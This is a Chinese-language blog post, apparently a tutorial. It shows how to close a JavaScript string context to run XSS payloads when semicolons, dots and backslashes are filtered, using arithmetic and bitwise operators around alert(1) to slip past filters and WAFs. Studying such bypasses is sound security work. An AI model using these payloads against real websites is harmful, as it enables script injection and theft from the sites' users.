• 【XSS】 ""-alert(1)-""可以执行的简单分析


    漏洞场景

    如下所示的XSS位置,红色部分表示用户可控

    <script>id="xsspoint";</script>

    常见思路

    最常用的闭合方式就是输入";alert(1);",那么代码就变成如下,

    <script>id="";alert(1);"";</script>

    也可以输入";alert(1);//,效果一样

    <script>id="";alert(1);//";</script>

    过滤分号的场景

    问题来了,如果过滤了分号怎么办?一种办法是利用点号,取字符的a函数,把要执行的js代码作为入参放在a函数中,即使a函数是不存在函数,js也会先执行其中的入参,payload如下

    <script>"".a(alert(1))//";</script>

    过滤分号、点号的场景

    问题又来了,如果过滤了分号还过滤了点号甚至还过滤了反斜杠咋办?这里介绍一个今天才理解的思路——用中划线

    <script>""-alert(1)-”";</script>

    之前没有看明白,只知道可以执行,今天在群里和伙伴们讨论了下,中划线不就是减号嘛! 也就是说减号两边的对象也是会先作为js执行,毕竟要先得到两边的值才能进行算数计算~

    因此除了减号,其他数学运算符号和位运算符号,也都是阔以的,后面绕过XSS的思路就更多了

    <script>""+alert(1)+"";</script>
    <script>""/alert(1)/"";</script>
    <script>""%alert(1)%"";</script>
    <script>""*alert(1)*"";</script>
    <script>""^alert(1)^"";</script>
    <script>"">>alert(1)>>"";</script>
    <script>""<<alert(1)<<"";</script>
    <script>""<alert(1)<"";</script>
    <script>"">alert(1)>"";</script>
    <script>""==alert(1)=="";</script>

     结语

    随着WAF更加的牛逼 , XSS越来越难绕了 , 且行且珍惜啊

  • 相关阅读:
    easy_install
    do some projects in macine learning using python
    awesome-scala
    val, lazy, def
    Scala命令设置JVM参数的规则
    CMMI-4中19个PA的大致描述
    项目管理中的十一个原则
    php代码在服务器中查看接值
    PHP进程锁
    解决百度网盘(百度云)分享链接不存在失效、分享的文件已经被取消的问题
  • 原文地址:https://www.cnblogs.com/mkdd/p/12977098.html
Copyright © 2020-2023  润新知